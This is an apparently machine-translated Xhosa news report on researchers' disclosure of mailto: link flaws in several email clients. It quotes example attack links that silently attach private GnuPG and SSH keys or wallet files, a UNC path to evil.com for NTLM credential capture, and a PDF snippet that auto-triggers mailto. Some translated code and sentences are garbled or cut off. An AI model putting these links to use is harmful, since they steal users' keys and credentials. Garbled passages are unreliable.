Abaphandi abavela kwiYunivesithi yaseRuhr Bochum (eJamani)
Unxulumano «
Abathengi bemeyile iThunderbird, i-GNOME Evolution (CVE-2020-11879), KDE KMail (CVE-2020-11880), IBM/HCL Notes (CVE-2020-4089) kunye nePegasus Mail bezisengozini kuhlaselo olungenamsebenzi olukuvumela ukuba uqhoboshele ngokuzenzekelayo. nayiphi na ifayile yendawo, echazwe ngekhonkco elifana ne "mailto:?attach=path_to_file". Ifayile iqhotyoshelwe ngaphandle kokubonisa isilumkiso, ngoko ke ngaphandle kwengqwalasela ekhethekileyo, umsebenzisi akanakuqaphela ukuba ileta iya kuthunyelwa ngesinamathiselo.
Umzekelo, usebenzisa ikhonkco elifana ne “mailto:[imeyile ikhuselwe]&subject=Isihloko&body=Text&attach=~/.gnupg/secring.gpg" ungafaka izitshixo zabucala ezisuka kwi-GnuPG kunobumba. Ungathumela kwakhona imixholo ye-crypto wallets (~/.bitcoin/wallet.dat), izitshixo ze-SSH (~/.ssh/id_rsa) kunye naziphi na iifayile ezifikelelekayo kumsebenzisi. Ngaphezu koko, i-Thunderbird ikuvumela ukuba uncamathisele amaqela eefayile ngemaski usebenzisa ulwakhiwo olufana ne "ncamathisela=/tmp/*.txt".
Ukongeza kwiifayile zasekuhlaleni, abanye abaxumi be-imeyile baqhuba amakhonkco kugcino lwenethiwekhi kunye neendlela kwiseva ye-IMAP. Ngokukodwa, iiNqaku ze-IBM zikuvumela ukuba udlulisele ifayile kulawulo lwenethiwekhi xa ulungisa amakhonkco afana ne-"ncamathisela=\\evil.com\dummyfile", kunye nokuthintela iiparamitha zoqinisekiso lwe-NTLM ngokuthumela ikhonkco kwiseva ye-SMB elawulwa ngumhlaseli. (isicelo siya kuthunyelwa kunye nomsebenzisi weeparamitha zoqinisekiso lwangoku).
IThunderbird iqhubekisela phambili ngempumelelo izicelo ezinje “attach=imap:///fetch>UID>/INBOX>1/”, ekuvumela ukuba uncamathisele umxholo osuka kwiifolda ezikwiseva ye-IMAP. Ngaxeshanye, imiyalezo efunyenwe kwi-IMAP, efihliweyo nge-OpenPGP kunye ne-S/MIME, ikhutshelwa ngokuzenzekela ngumxhasi wemeyile phambi kokuba ithunyelwe. Abaphuhlisi beThunderbird babe
Iinguqulelo ezindala ze-Thunderbird zikwasengozini kwezinye iintlobo ezimbini zohlaselo kwi-PGP kunye ne-S/MIME ecetywe ngabaphandi. Ngokukodwa, iThunderbird, kunye ne-OutLook, PostBox, eM Client, MailMate kunye ne-R2Mail2, ibiphantsi kohlaselo lokubuyisela olungundoqo, olubangelwa yinto yokuba umxhasi weposi ungenisa ngokuzenzekelayo kwaye afake izatifikethi ezitsha ezithunyelwa kwimiyalezo ye-S/MIME, evumela umhlaseli aququzelele ukutshintshwa kwezitshixo zikawonke-wonke esele zigcinwe ngumsebenzisi.
Uhlaselo lwesibini, apho iThunderbird, iPostBox kunye neMailMate zichaphazeleka khona, ilawula iimpawu zendlela yokugcina imiyalezo eyidrafti ngokuzenzekelayo kwaye ivumela, kusetyenziswa iparameters ze-mailto, ukuqalisa uguqulelo oluntsonkothileyo lwemiyalezo efihliweyo okanye ukongeza utyikityo lwedijithali lwemiyalezo engenamkhethe, Ugqithiso olulandelayo lwesiphumo kumncedisi we-IMAP womhlaseli. Kolu hlaselo, i-ciphertext ihanjiswa ngeparameter "yomzimba", kwaye ithegi "yokuvuselela i-meta" isetyenziselwa ukuqalisa umnxeba kumncedisi we-IMAP womhlaseli. Umzekelo: ' '
Ukusetyenzwa ngokuzenzekelayo amakhonkco e-“mailto:” ngaphandle kokusebenzisana komsebenzisi, amaxwebhu ePDF ayilwe ngokukodwa anokusetyenziswa-isenzo se-OpenAction kwiPDF ikuvumela ukuba uqalise ngokuzenzekelayo umphathi we-mailto xa uvula uxwebhu:
I-%PDF-1.5
1 obj
<< /Uhlobo /Ikhathalogu /OpenAction [2 0 R] >>
endobj
2 obj
<< /Uhlobo /Isenzo /S /URI/URI (imeyile:?body=——QALA UMYALEZO WEPGP——[…])>>
endobj
umthombo: opennet.ru